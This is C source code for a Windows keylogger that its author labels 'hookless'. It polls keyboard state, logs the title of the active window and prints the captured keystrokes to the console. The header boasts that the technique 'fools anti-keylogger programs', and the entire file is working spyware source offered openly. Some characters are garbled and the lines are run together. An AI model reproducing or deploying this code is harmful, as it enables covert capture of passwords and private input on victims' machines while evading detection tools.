//**********************************************************************// Version: V1.0// Coder: WinEggDrop// Date Release: NULL// Purpose: Hookless Keylogger// Test PlatForm: Win 2K Pro And Server SP4// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Test Yet)// Limitation: More Usage Of System Resource; May Not Work On Win9x// Advantage: Hookless Technique Fools Anti-Keylogger Programs//**********************************************************************#include <windows.h>#include <stdio.h>// Some Global Variables// Lower Case Key & Some Other Keyschar *LowerCase[]={"b","e","[ESC]","[F1]","[F2]","[F3]","[F4]","[F5]","[F6]","[F7]","[F8]","[F9]","[F10]","[F11]","[F12]","`","1","2","3","4","5","6","7","8","9","0","-","=","[TAB]","q","w","e","r","t","y","u","i","o","p","[","]","a","s","d","f","g","h","j","k","l",";","'","z","x","c","v","b","n","m",",",".","/","\\","[CTRL]","[WIN]"," ","[WIN]","[Print Screen]","[Scroll Lock]","[Insert]","[Home]","[PageUp]","[Del]","[End]","[PageDown]","[Left]","[UP]","[Right]","[Down]","[Num Lock]","/","*","-","+","0","1","2","3","4","5","6","7","8","9",".",};// Upper Case Key & Some Other Keyschar *UpperCase[]={"b","e","[ESC]","[F1]","[F2]","[F3]","[F4]","[F5]","[F6]","[F7]","[F8]","[F9]","[F10]","[F11]","[F12]","~","!","@","#","\{1}quot;,"%","^","&","*","(",")","_","+","[TAB]","Q","W","E","R","T","Y","U","I","O","P","{","}","A","S","D","F","G","H","J","K","L",":","\"","Z","X","C","V","B","N","M","<",">",".?","│","[CTRL]","[WIN]"," ","[WIN]","[Print Screen]","[Scroll Lock]","[Insert]","[Home]","[PageUp]","[Del]","[End]","[PageDown]","[Left]","[Up]","[Right]","[Down]","[Num Lock]","/","*","-","+","0","1","2","3","4","5","6","7","8","9",".",};// Ascii Keys,Forget About Itint SpecialKeys[]={8,13,27,112,113,114,115,116,117,118,119,120,121,122,123,192,49,50,51,52,53,54,55,56,57,48,189,187,9,81,87,69,82,84,89,85,73,79,80,219,221,65,83,68,70,71,72,74,75,76,186,222,90,88,67,86,66,78,77,188,190,191,220,17,91,32,92,44,145,45,36,33,46,35,34,37,38,39,40,144,111,106,109,107,96,97,98,99,100,101,102,103,104,105,110,};HWND PreviousFocus=NULL;// End Of Data// Function ProtoType Declaration//----------------------------------------------------------------------BOOL IsWindowsFocusChange();BOOL KeyLogger();//----------------------------------------------------------------------// End Of Fucntion ProtoType Declaration// Main Functionint main(){KeyLogger(); // Run The Keyloggerreturn 0; // The Program Quit}// End Of Main//-------------------------------------------------------------------------// Purpose: To Check The Active Windows Title// Return Type: Boolean// Parameters: NULL//-------------------------------------------------------------------------BOOL IsWindowsFocusChange(){HWND hFocus = GetForegroundWindow(); // Retrieve The Active Windows's FocusBOOL ReturnFlag = FALSE; // Declare The Return Flagif (hFocus != PreviousFocus) // The Active Windows Has Change{PreviousFocus = hFocus; // Save The Old Active Windos Focusint WinLeng = GetWindowTextLength(hFocus); // Get The Active Windows's Caption's Lengthchar *WindowCaption = (char*) malloc(sizeof(char) * (WinLeng + 2)); // Allocate Memory For The CaptionGetWindowText(hFocus,WindowCaption,(WinLeng + 1)); // Retrieve The Active Windows's Captionif (strlen(WindowCaption) > 0) // Really Get The Windows's Caption{printf("\r\nThe Active Windows Title: %s\r\n",WindowCaption); // Display The Active Windows's CaptionReturnFlag=TRUE; // Indicate The Windows's Focus Has Changed}free(WindowCaption); // Free The Allocated Memory}return ReturnFlag; // Return The Flag}// End Of IsWindowsFocusChange Function//-------------------------------------------------------------------------// Purpose: To Manage(Display)The Keys Retrieved From System's Key Buffer// Return Type: Boolean// Parameters: NULL//-------------------------------------------------------------------------BOOL KeyLogger(){int bKstate[256] = {0}; // Declare The Key State Arrayint i,x;char KeyBuffer[600]; // Key Buffer Arrayint state; // Variable To Hode State Of Some Special Key Like CapsLock,Shift And ectint shift; // Variable To Hode State Of Shift Key// Reset The Buffermemset(KeyBuffer,0,sizeof(KeyBuffer));while(TRUE) // Forever Loop Is Taking Place Here{Sleep(8); // Rest For A While,And Avoid Taking 100% CPU Usage.Pretty Important To Add This Line Or The System Gets Fucked UPif (IsWindowsFocusChange()) //Check The Active Windows Title{if (strlen(KeyBuffer) != 0) // Keys Are Pressed{printf("%s\r\n",KeyBuffer); // Display The Keys Pressedmemset(KeyBuffer,0,sizeof(KeyBuffer)); // reset The Buffer}}for(i=0;i<92;i++) // Looping To Check Visual Keys{shift = GetKeyState(VK_SHIFT); // Check Whether Shift Is Pressedx = SpecialKeys[ i ]; // Match The Keyif (GetAsyncKeyState(x) & 0x8000) // Check Combination Keys{// See Whether CapsLocak Or Shift Is Pressedif (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed{bKstate[x] = 1; //Uppercase Characters A-Z}elseif (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed{bKstate[x] = 2; //Lowercase a-z}elseif (shift < 0) // Shift Is Pressed{bKstate[x] = 3; //Uppercase Characters A-Z}elsebKstate[x] = 4; //Lowercase a-z}else{if (bKstate[x] != 0) // No Combination Keys Detected{state = bKstate[x]; // Retrieve The Current StatebKstate[x] = 0; // Reset The Current Stateif (x == 8) // Back Space Is Detected{KeyBuffer[strlen(KeyBuffer) - 1] = 0; // One Key Back Thencontinue; // Start A New Loop}elseif (strlen(KeyBuffer) > 550) // Buffer FULL{printf("%s <Buffer Full>",KeyBuffer); // Display The Keys Retrievedmemset(KeyBuffer,0,sizeof(KeyBuffer)); // Reset The Buffercontinue; // Start A New Loop}elseif (x == 13) // Enter Is Detected{if (strlen(KeyBuffer) == 0) // No Other Keys Retrieved But Enter{continue; // Start A New Loop}printf("%s<Enter>\r\n",KeyBuffer); // Retrieve Other Keys With Entermemset(KeyBuffer,0,sizeof(KeyBuffer)); // Display The Keys With Entercontinue; // Start A New Loop}elseif ((state%2) == 1) //Must Be Upper Case Characters{strcat(KeyBuffer,UpperCase[ i ]); // Store The Key To Key Buffer}elseif ((state%2) == 0) // Must Be Lower Case Characters{strcat(KeyBuffer,LowerCase[ i ]); // Store The Key To Key Buffer}}}}// End Of For Loop}// End Of While Loopreturn TRUE; // Return To The Caller}// End Of KeyLogger Function// End Of File
